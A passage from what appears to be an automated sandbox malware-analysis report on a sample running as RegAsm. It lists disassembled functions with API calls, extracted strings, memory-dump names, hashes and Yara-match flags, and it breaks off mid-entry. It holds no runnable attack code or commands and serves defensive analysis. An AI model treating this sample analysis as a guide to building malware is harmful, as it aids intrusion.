                                                                                                                                                                                                • Instruction Fuzzy Hash: 2901697A604300AFE7109A5AEC81F93BBE9EB8CB24F04845DF68DD7240D772BC468761
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B49EF30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B49EFB0
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B49EFB5
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B49EFA6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: ef2f7a0191d5d3e034b7a61ec197409021b1506d580d6d0c018c1d5db097bd67
                                                                                                                                                                                                • Instruction ID: f49847df54a156f08ff18c0116aee6d34d7bf62586724f0abd64d235f0b884bd
                                                                                                                                                                                                • Opcode Fuzzy Hash: ef2f7a0191d5d3e034b7a61ec197409021b1506d580d6d0c018c1d5db097bd67
                                                                                                                                                                                                • Instruction Fuzzy Hash: B801F5B1A01621AFD7148F08EC48BCA7FA5AFE5305F05811CE9885B344D331E84DC7D6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B509180 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s_stat
                                                                                                                                                                                                • API String ID: 0-920702477
                                                                                                                                                                                                • Opcode ID: 381a03aeb1040ea2c310fbcda0a2122a9f76eba28649432fde16e4d74a4c131d
                                                                                                                                                                                                • Instruction ID: 64fe83028aad55e65503f06eacd0cc4d0400e3b42a1abafeac0454d1eee82337
                                                                                                                                                                                                • Opcode Fuzzy Hash: 381a03aeb1040ea2c310fbcda0a2122a9f76eba28649432fde16e4d74a4c131d
                                                                                                                                                                                                • Instruction Fuzzy Hash: A8F02762B056523BEB00467DBC81BC6EFE9EF48160F148629E40CA2108C322BC915391
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4B7F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 1B4B7F76
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
                                                                                                                                                                                                • API String ID: 0-3072645960
                                                                                                                                                                                                • Opcode ID: 528211fb9997cb6736ed4ebc6099194a5a15897aa81dcf0abcfbd3849023b023
                                                                                                                                                                                                • Instruction ID: 1c99276f709505c2d37afc88b01f4411d4f31bab7222c6f46b73b73d30c601de
                                                                                                                                                                                                • Opcode Fuzzy Hash: 528211fb9997cb6736ed4ebc6099194a5a15897aa81dcf0abcfbd3849023b023
                                                                                                                                                                                                • Instruction Fuzzy Hash: A9F02B36B4430296DB005F19FC02BC97BD5AFD5311F198129F94496240F760E88583B1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040FC97 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00410095,00000000), ref: 0040FCA2
                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00410095,00000000), ref: 0040FCA9
                                                                                                                                                                                                • wsprintfW.USER32 ref: 0040FCBA
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Heap$AllocProcesswsprintf
                                                                                                                                                                                                • String ID: %hs
                                                                                                                                                                                                • API String ID: 659108358-2783943728
                                                                                                                                                                                                • Opcode ID: d5ea7713d317f2ebb614152b3c5bf60322d04d2ff2908d104b3bc2f949a7d368
                                                                                                                                                                                                • Instruction ID: bcd4547f941fe6a092a856821e4b12fc33d1e40d09299ab1671c3f7be8122737
                                                                                                                                                                                                • Opcode Fuzzy Hash: d5ea7713d317f2ebb614152b3c5bf60322d04d2ff2908d104b3bc2f949a7d368
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BD05E317412287BC62027A4BC0AFAA7E28EB15AE2F400030FA09C6961CAA1441147EA
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B596B50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • cannot open file, xrefs: 1B596B59
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B596B5E
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B596B50
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$cannot open file$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                                                                                                                                                                • API String ID: 0-1799306995
                                                                                                                                                                                                • Opcode ID: f805dd2869ff7c7f3122d1c49b338d94d86540c3193ca76919eb019a9f0d38ac
                                                                                                                                                                                                • Instruction ID: 19077a90907a0d2c779c7da9ff2770040ec3e39fa5f470ef0ada9ee995ec55c9
                                                                                                                                                                                                • Opcode Fuzzy Hash: f805dd2869ff7c7f3122d1c49b338d94d86540c3193ca76919eb019a9f0d38ac
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DB092DB700280B6DA043B54CE03FD72C316778682F81CAA8B149392A6E296C0908372
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5CC1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B5CC1F9
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B5CC1FE
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B5CC1F0
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: 880f186eb7be347389632487ce66260c1fafa307c46c6555f1f6b611240e593a
                                                                                                                                                                                                • Instruction ID: 3df7045dc88c3863bdddc41a1dba3bbe055dccae3099e355e2a5b7fbb3f35e01
                                                                                                                                                                                                • Opcode Fuzzy Hash: 880f186eb7be347389632487ce66260c1fafa307c46c6555f1f6b611240e593a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FB092EA710A48F6DF042344CE83FDA6C319BF8347F81C6ACB2556D2A6E26580506372
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B538EB0 Relevance: 6.2, APIs: 4, Instructions: 175COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 195cf5c488fa45a5daa598f3ed4972b408fda929c477fb934d9ebc7a08371bd8
                                                                                                                                                                                                • Instruction ID: f65a33fc144a075fde1485f9751cfa90a9d96364105bfeaf56f0298d6b41a4fe
                                                                                                                                                                                                • Opcode Fuzzy Hash: 195cf5c488fa45a5daa598f3ed4972b408fda929c477fb934d9ebc7a08371bd8
                                                                                                                                                                                                • Instruction Fuzzy Hash: C45136B1A043D24AF7228F759C457DAFFF49F45312F084AA9E8C58B362E369D488C361
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4B7DA0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: c074a326e871b636ae283752056f8f4c812119a7c12a6f9dc4f7d6b2f0ec5765
                                                                                                                                                                                                • Instruction ID: 2e1c52e8d61dd2081eafdbeb254c51a3b14ae1b3bfb222f79b3c8caaa88ea37a
                                                                                                                                                                                                • Opcode Fuzzy Hash: c074a326e871b636ae283752056f8f4c812119a7c12a6f9dc4f7d6b2f0ec5765
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7141EF366016019FD714CF18DA80A96F7E1FF84324F18856EEA8687B62D772FC51CBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4BCAE0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 64f15566ddab25c787ed05cf10e2b1c50c44e9ad38fae7b2066188378aa964c6
                                                                                                                                                                                                • Instruction ID: 9ebe7e5129aef928b5f9404b7b1df8d7285a44e8bcc413cdd99378d1ee4e83c1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 64f15566ddab25c787ed05cf10e2b1c50c44e9ad38fae7b2066188378aa964c6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1631C3B6B083019BDB10CF68E980B9AB7E4FF84311F00497EEA45CB751E325E994C7A5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4BB1F0 Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                                                                                                                                                                • Instruction ID: 39adff561e135a3e28b5651de17c04dbfdc21ff9f074ca8e5310251314b0c130
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B319E75504B419ADB28CB25E9487DAB7E0FF95310F00C92DD9DAC2A00D371F48A87A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004106E3 Relevance: 6.1, APIs: 4, Instructions: 92stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strtok_s$H_prolog
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1158113254-0
                                                                                                                                                                                                • Opcode ID: b5e458bbd876f3b70d02ec80c078dd4daf08301cacabd59262e3263f66b59eb0
                                                                                                                                                                                                • Instruction ID: da56b3c82fb463c8d862a91f29ea6f746d41f3decd9773721f134f1ac31463fb
